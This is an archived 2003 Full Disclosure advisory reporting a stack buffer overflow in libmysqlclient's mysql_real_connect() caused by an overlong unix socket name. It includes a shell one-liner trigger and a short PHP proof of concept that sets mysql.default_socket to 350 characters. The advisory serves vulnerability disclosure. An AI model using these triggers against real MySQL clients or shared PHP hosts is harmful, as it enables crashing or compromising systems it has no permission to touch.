Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

libmysqlclient 4.x and below mysql_real_connect() buffer overflow.

From: pokleyzz <pokleyzz () scan-associates net>
Date: Thu, 12 Jun 2003 22:26:49 +0800
SCAN Associates Sdn Bhd Security Advisory

Products: libmysqlclient 4.x and below (http://www.mysql.com)
Date: 12 June 2003
Author:  pokleyzz <pokleyzz_at_scan-associates.net>
Contributors: sk_at_scan-associates.net shaharil_at_scan-associates.net munir_at_scan-associates.net 
URL: http://www.scan-associates.net

Summary: libmysqlclient 4.x and below mysql_real_connect() buffer overflow.

Description
===========
libmysqlclient is client library to communicate with mysql server. 
Details
=======
There is stack buffer overflow in mysql_real_connect() function with long unix socket name (over 300 character). 

ex:
        mysql -S `perl -e 'print "A" x 350'` -hlocalhost

proof of concept
----------------
This bug have succesfully test on safe_mode php in our latest geeklog bug
http://www.scan-associates.net/papers/geeklog.txt where user can upload *.php file. 

<?php
   for ($i;$i<350;$i++)
        $buff .= "A";
   ini_set("mysql.default_socket","$buff");
   mysql_connect("localhost", "blabla", "blabla");
?>
Vendor Response =============== Vendor has been contacted on 06/01/2003 and fix will available soon. 


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Previous By Date Next
Previous By Thread Next

Current thread: